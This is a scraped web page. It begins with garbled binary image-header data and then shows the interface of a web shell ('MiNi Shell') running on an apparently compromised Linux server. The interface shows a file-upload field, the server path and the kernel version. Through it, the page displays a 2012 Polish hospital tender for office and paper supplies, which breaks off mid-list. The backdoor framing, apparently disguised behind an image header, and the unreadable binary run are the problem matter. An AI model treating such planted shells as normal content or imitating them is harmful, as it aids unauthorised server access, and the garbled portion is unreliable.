JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120209/39668-N-2012.html

<p class="kh_header"><b>Krotoszyn: Dostawa  materiałów papierniczych i biurowych, materiałów eksploatacyjnych do drukarek i faksów, kopert RTG oraz płyt CD i DVD dla SP ZOZ Krotoszyn.</b><br>
<b>Numer ogłoszenia: 39668 - 2012; data zamieszczenia: 09.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Młyńska 2, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 5880390 w. 253, faks 062 5880402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  materiałów papierniczych i biurowych, materiałów eksploatacyjnych do drukarek i faksów, kopert RTG oraz płyt CD i DVD dla SP ZOZ Krotoszyn..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa  materiałów papierniczych i biurowych, materiałów eksploatacyjnych do drukarek i faksów, kopert RTG oraz płyt CD i DVD dla SP ZOZ Krotoszyn - PAKIET NR 1-6.
WARTOŚĆ PONIŻEJ 200 TYS. EURO..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dostawa  materiałów papierniczych i biurowych, materiałów eksploatacyjnych do drukarek i faksów, kopert RTG oraz płyt CD i DVD, maksymalnie 20% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 22.99.30.00-7, 30.19.76.30-1, 30.19.76.44-2, 30.19.93.30-2, 30.19.97.13-1, 30.12.51.10-5, 30.19.23.20-0, 30.19.23.40-6, 32.58.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wszystkie dokumenty i oświadczenia wymienione w rozdziale VI niniejszej SIWZ oraz : 
a.	Formularz ofertowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 1.
b.	Formularz cenowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 2. Do oferty należy dołączyć wypełnione Formularze cenowe również w formie elektronicznej (plik.xls) z niezablokowanymi formułami. Formularze cenowe w formie pliku.xls umieszczone są i dostępne do ściągnięcia na stronie internetowej Zamawiającego www.bip.spzoz.krotoszyn.pl .
c.	Projekt umowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 4.

W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo (oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 6 PROJEKTU UMOWY: 2. Strony ustalają możliwość zmiany cen wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy. Za okoliczność taką uważa się : - zmianę stawek podatku VAT. 3. W przypadku ustawowej zmiany stawki podatku VAT na przedmiot niniejszego zamówienia, jej zmiana następuje z mocy prawa. § 14 PROJEKTU UMOWY. 1. Zmiana postanowień zawartej umowy może nastąpić wyłącznie w sytuacji przewidzianej w § 6 umowy oraz w przypadkach wymienionych poniżej, za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności.2.	Strony dopuszczają zmiany umowy w zakresie: 
-        nazwy produktu przy zachowaniu jego parametrów 
-        przedmiotowym / produkt zamienny 
-        sposobu konfekcjonowania 
-        liczby opakowań 
-        wprowadzenia do sprzedaży przez wykonawcę produktu zmodyfikowanego / udoskonalonego 
 
Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.spzoz.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ KROTOSZYN, UL. MŁYŃSKA 2, 63-700 KROTOSZYN, POKÓJ NR 20..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2012 godzina 10:00, miejsce: SEKRETARIAT SPZOZ KROTOSZYN, UL. MŁYŃSKA 2, 63-700 KROTOSZYN, POKÓJ NR 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający w pakiecie nr 4 i 5 :


-	dopuszcza składanie ofert równoważnych (tzw. zamienników), przy czym za równoważne Zamawiający uważa produkty fabrycznie nowe poddane pełnej refabrykacji, czyli posiadające wałki optyczne, bębny światłoczułe i listwy zbierające fabrycznie nowe, których parametry techniczne, jakościowe, funkcjonalne oraz użytkowe są zgodne z obowiązującymi normami i standardami. Produkt musi być kompatybilny ze sprzętem, do którego jest przeznaczony, o parametrach nie gorszych niż wymienione w specyfikacji istotnych warunków zamówienia (Załącznik nr 2 - Formularz cenowy).
 
-	w przypadku zaoferowania produktów równoważnych (zamienników) powinny być one objęte gwarancją na prawidłowe działanie produktu przez cały okres eksploatacji, do momentu wyczerpania środka barwiącego. W przypadku uszkodzenia powstałego na skutek wad równoważnego materiału eksploatacyjnego Wykonawca będzie zobowiązany do zwrotu kosztów naprawy urządzenia, w którym ten materiał został zastosowany.  

Wydajność tuszy do zaoferowanych drukarek atramentowych powinna być zgodna z 	międzynarodową normą: ISO/IEC 24711:2006 (lub równoważną), która określa metodologię badania 	wydajności kartridży, natomiast wydajność tonerów do drukarek laserowych  powinna 	być zgodna z międzynarodową normą: ISO/IEC 19752:2004 (lub równoważną)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pakiet 1 - Artykuły biurowo-papiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Blok makul.not. A-4 w kratke 100 k. bez perforacji 	szt.	100
2.	Blok makul.not. A-5 w kratke 100 k. bez perforacji	szt.	150
3.	Blok makul.not. A-6 w kratke 100 k.	szt.	100
4.	Blok rysunkowy A-4	szt.	20
5.	Blok techniczny A-4	szt.	60
6.	Cienkopis kolorowy klasy Pelikan, Stabilo w kolorze czarnym, niebieskim, czerwonym, ziolonym (kolory wg wyboru Zamawiającego)	szt.	1200
7.	Długopis automatyczny klasy Zenith z wkładem w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego)	szt.	50
8.	Długopis automatyczny średniej klasy z wkładem w kolorze czarnym, niebieskim, czerwonym, ziolonym (kolory wkładu wg wyboru Zamawiającego)	szt.	1300
9.	Długopis klasy - Pentel z wkładem w kolorze czarnym, niebieskim, czerwonym, ziolonym (kolory wkładu wg wyboru Zamawiającego)	szt.	50
10.	Długopis na przylepiec  	szt.	10
11.	Długopis żelowy z zatyczką klasy TOP z wkładem w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego)	szt.	90
12.	Długopis żelowy klasy  Uni - ball signo automatyczny z wkładem w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego)	szt.	15
13.	Dziurkacz metalowy 2 otwory,. duży z ogranicznikiem, na co najmniej 15 kartek	szt.	20
14.	Dziurkacz metalowy 2 otwory, na co najmniej 30 kartek z ogranicznikiem	szt.	10
15.	Folia do laminowania samoprzylepna A4 100 szt	op.	5
16.	Folia do drukarek atramentowych A4 50 szt.	op.	1
17.	Folia do ksero A4 100 szt.	op.	1
18.	Folia do laminowania A-3  op. 100 szt. gramatura 60mic	op.	4
19.	Folia do laminowania A-4  op. 100 szt. gramatura 60mic	op.	20
20.	Folia do laminowania formatu 60*95 mm op.100szt.	op.	5
21.	Folia do laminowania formatu 65*95 mm op.100szt.	op.	10
22.	Grzbiet do bindownicy szer. 6 mm  op. 100 szt.	op.	1
23.	Grzbiet do bindownicy szer. 8 mm  op. 100 szt.	op.	1
24.	Grzbiet do bindownicy szer. 10 mm  op. 100 szt.	op.	1
25.	Grzbiet do bindownicy szer. 12 mm  op. 100 szt.	op.	1
26.	Grzbiet do bindownicy szer. 14 mm  op. 100 szt.	op.	1
27.	Grzbiet do bindownicy szer. 16 mm  op. 100 szt.	op.	1
28.	Grzbiet do bindownicy szer. 18 mm  op. 100 szt.	op.	1
29.	Grzbiet do bindownicy szer. 20 mm  op. 100 szt.	op.	1
30.	Grzbiet do bindownicy szer. 22 mm  op. 100 szt.	op.	1
31.	Grzbiet do bindownicy szer. 25 mm  op. 100 szt.	op.	1
32.	Gumka do mazania-klasy Pelikan	szt.	50
33.	Kalka maszynowa A - 3  25szt	pacz.	1
34.	Kalka maszynowa A - 4  25 szt. 	pacz.	2
35.	Kalka ołówkowa A - 3 25 szt.	pacz.	1
36.	Kalka ołówkowa A - 4 25 szt.	pacz.	2
37.	Kartki do not. samoprzylepne 40x50 mm	op.	300
38.	Kartki do not. samoprzylepne 75x100mm	op.	30
39.	Kartki do not. samoprzylepne 75x75 mm	op.	200
40.	Klej biurowy w sztyfcie wkręcany 9 gr.	szt.	60
41.	Klej biurowy w tubce 50 ml	szt.	130
42.	Koperta B-5   op. 100 szt. szara,  HK z paskiem	op.	150
43.	Koperta samoprzlepna C-6  op. 100 szt.  biała	op.	200
44.	Koperta C-5  op. 100 szt.  Biała, HK z paskiem	op.	150
45.	Koperta B-4  op. 100 szt., szara, HK z paskiem	op.	15
46.	Koperta samoprzylepna B-4  składana szara, op. 100 szt.	op.	2
47.	Koperta samoprzylepna B-4  składana szara, op. 100 szt.	op.	2
48.	Koperta z zabezpieczeniem powietrznym w formie folii bąbelkowej, D14 biała , samoklejąca z paskiem	szt.	30
49.	Koperta z zabezpieczeniem powietrznym w formie folii bąbelkowej, H18 biała , samoklejąca z paskiem	szt.	30
50.	Koperta z zabezpieczeniem powietrznym w formie folii bąbelkowej, I19 biała , samoklejąca z paskiem	szt.	30
51.	Koperta z zabezpieczeniem powietrznym w formie folii bąbelkowej do płyt CD biała , samoklejąca z paskiem	szt.	600
52.	Koperta do płyt CD, op. 10 szt., z okienkiem	op.	1290
53.	Kuwety na dokumenty	szt.	40
54.	Linijka przezroczysta 15 cm	szt.	10
55.	Linijka przezroczysta  20 cm	szt.	20
56.	Linijka przezroczysta  30 cm	szt.	25
57.	Linijka przezroczysta  50 cm	szt.	5
58.	Marker gruby 1-4mm, ścięta końcówka wodoodporny klasy BIC lub Reynolds, czarny	szt.	800
59.	Marker gruby 1-4mm, ścięta końcówka wodoodporny klasy Reynolds w kolorach: brąz, fiolet, pomarańcz, czarny (kolory wg wyboru Zamawiającego)	szt.	600
60.	Marker do płyt CD dwustronny, jedna końcówka do 0.5mm a druga od 0.6 do 0.8mm, wodoodporny	szt.	90
61.	Nożyczki do papieru duże klasy Lako   	szt.	35
62.	Nożyczki do papieru małe klasy Lako 	szt.	25
63.	Obwoluta A-4 przezroczysta twarda, zgrzew w kształcie litery L.	szt.	50
64.	Obwoluta A-4 przezroczysta twarda, zgrzew w kształcie litery U	szt.	50
65.	Obwoluta A-5 przezroczysta miękka  op. 100 szt.	op.	20
66.	Obwoluta A-4 do segr. miękka  op. 100 szt., groszkowa	op.	350
67.	Obwoluta A-4 do segr. z zamknięciem op. 25 szt.	op.	16
68.	Okładka A4 na zeszyt	szt.	50
69.	Okładka A5 na zeszyt	szt.	50
70.	Okładka do bindownicy karton  op. 100 szt., A-4, kolor biały	op.	5
71.	Okładka do bindownicy przezroczysta op. 100 szt., A-4, gr. 150mic	op.	5
72.	Ołówek automat z grafitem 0,5 mm	szt.	30
73.	Ołówki  HB  z gumką	szt.	100
74.	Pinezki opakowanie 50 szt.	op.	10
75.	Pinezki kolorowe tablicowe beczułki 100 szt.	op.	20
76.	Pisak klasa Point Marker biały olejowy grubość końcówki od 0.5 do 1.2mm	szt.	30
77.	Deska A-4 z klipem nie zamykana	szt.	30
78.	Deska A-4 z klipem zamykana	szt.	100
79.	Poduszka do pieczątek 11,5x7cm nasączona klasy np. Trodat	szt.	10
80.	Pojemnik na dokumenty  plastikowy stojący do czasopism	szt.	30
81.	Rozszywacz do zszywek	szt.	15
82.	Rysik do ołówka automatycznego gr. 0,5 mm 10 szt.	op.	20
83.	Segregator A-3 na 4 otwory w pionie	szt.	10
84.	Segregator kolorowy A-4  7  ze wzm. dołem, twardy	szt.	450
85.	Segregator kolorowy A-4  5  ze wzm. dołem, twardy	szt.	120
86.	Segregator kolorowy A-4  4 twardy       	szt.	50
87.	Segregator tekturowy A-4  7	szt.	250
88.	Segregator tekturowy A-4  5 	szt.	20
89.	Segregator kolorowy A5  7 wzmacniany dołem	szt.	40
90.	Skoroszyt tekturowy A -4, gramatura 250-280 g/m2, biały	szt.	50
91.	Skoroszyt tekturowy A - 4 z otworami do wpinania w segregator, gramatura 250-280 g m2,  biały	szt.	50
92.	Skoroszyt plastikowy A-4	szt.	30
93.	Skoroszyt plastikowy A 4 z otworami do wpinania w segregator	szt.	1600
94.	Skorowidz w kratke A-4	szt	10
95.	Spinacze biurowe 33 mm	op.	220
96.	Spinacze biurowe 50 mm	op.	20
97.	Szpagat jutowy gruby pakowy 500 gr.	motek	100
98.	Taśma klejąca dwustronna 5 cm  5 m	szt.	60
99.	Taśma klejąca pakowa 5 cm.  60 m.	szt.	30
100.	Taśma przezroczysta klejąca szer. 25mm dł. 30 jardów	szt.	240
101.	Teczka papierowa.na gumkę kolorowa, A 4	szt.	1200
102.	Teczka papierowa wiązana biała, A 4, gramatura 250-280 g m2,  	szt.	100
103.	Teczka plastikowa wiązana, A 4	szt.	50
104.	Temperówka do ołowków z pojemnikiem	szt.	30
105.	Tusz do pieczątek klasy Trodat lub Pelikan, kolor czerwony, niebieski, czarny (kolor wg wyboru Zamawiającego),	szt.	90
106.	Wkłady do długopisu  zaoferowanego w pozycji 8  w kolorze czarnym, niebieskim, czerwonym, ziolonym (kolory wkładu wg wyboru Zamawiającego)	szt.	500
107.	Wkłady do długopisu zaoferowanego w pozycji 9  w kolorze czarnym, niebieskim, czerwonym, ziolonym (kolory wkładu wg wyboru Zamawiającego)	szt.	150
108.	Wkłady do długopisu zaoferowanego w pozycji 11  w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego)	szt.	50
109.	Wkłady do długopisu zaoferowanego w pozycji 12  w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego)	szt.	20
110.	Wkłady do długopisu zaoferowanego w pozycji 7  w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego)	szt.	150
111.	Zakreślacz-flamaster różne kolory  wg wyboru Zamawiającego	szt.	140
112.	Zeszyt 200 kartek twarda oprawa. A-4 zszyw.	szt.	10
113.	Zeszyt w krat 96 k. miękka opr. A-4 zszyw.	szt.	50
114.	Zeszyt w krat 96 k. twarda opr.A-4 zszyw.	szt.	100
115.	Zeszyt w krat 96 k. twarda oprawa A-5	szt.	130
116.	Zeszyt w krat 32 k. miękka oprawa  A 5	szt.	100
117.	Zeszyt w krat 60 k. miekka oprawa, A 5	szt.	120
118.	Zeszyt w krat 80 k. miękka oprawa , A 5	szt.	50
119.	Zszywacz biurowy na 25 kartek	szt.	30
120.	Zszywacz biurowy obrotowy	szt.	15
121.	Zszywki 24 6 , 1000 szt.	op.	600
122.	Identyfikator, kieszonka z elastycznej folii otwarta od góry z wycięciem do założenia paska z klipsem format 78*110 mm	szt.	600
123.	Klips metalowy do identyfikatora z paskiem z mocnego przezroczystego tworzywa i metalowym zatrzaskiem	szt.	600
124.	Etykieta samoprzylepna 52,5mm * 25,4mm, A4, op 100szt.	op.	120
125.	Etykieta samoprzylepna 210mm * 297 mm, A4, op. 100s	op.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2 - Artykuły papiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Papier uniwersalny biały  80 gr  m2  A-4 klasa nie niższa niż np. Poljet	ryza 500szt.	20
2.	Papier uniwersalny biały  80 gr  m2  A-4 klasa nie niższa niż np. Pollux	ryza 500szt.	20
3.	Papier uniwersalny biały  80 gr  m2  A-3 klasa nie niższa niż np. Pollux	ryza 500szt.	10
4.	Papier uniwersalny biały  80 gr m2  A-4 klasa nie niższa niż np. Polspeed	ryza 500szt.	1460
5.	Papier uniwersalny biały 80 gr m2  A-3 klasa nie niższa niż np. Polspeed	ryza 500szt.	25
6.	Papier uniwersalny biały  80 gr m2  A-5 klasa nie niższa niż np. Polspeed	ryza 500szt.	40
7.	Papier komputerowy 240 x 6 1+0, 4000 składek/karton	karton	8
8.	Papier komputerowy  210 1+0, 2000 składek -karton	karton	7
9.	Papier kolorowy A-4 do ksera jeden kolor, 100 kartek	ryza	8
10.	Papier kolorowy A-3 do ksera jeden kolor, 100 kartek	ryza	2
11.	Papier kancelaryjny w kratkę A-3 op. 500 szt.	ryza	4
12.	Papier wizytówkowy A-4,  op. 20 szt.	op.	50
13.	Papier fotograficzny do drukarek A4 50 szt., gramat. 200	op.	2
14.	Papier biały satynowany A4, gramatura 250g m2, paczka 250szt.	ryza	2
15.	Taśma papierowa biała do maszyn liczących 57 mm (25m)	szt.	10
16.	Taśma papierowa biała termoczuła 110 mm (20m)	szt.	40
17.	Taśma papierowa biała termoczuła 57 mm (25m)	szt.	100
18.	Taśma papierowa termoczuła 79mm 25 m	szt.	30
19.	Taśma papierowa termoczuła biała 57 mm 14 m	szt.	200
20.	Taśma dwurzędowa do metkownicy 26x16 biała prosta, proste brzegi	szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.99.30.00-7, 30.19.76.30-1, 30.19.76.44-2, 30.19.93.30-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3 - Koperty do błon rentgenowskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Koperta RTG 6 x 5 biała	szt.	1000
2.	Koperta RTG 20 x 26  biała	szt.	4500
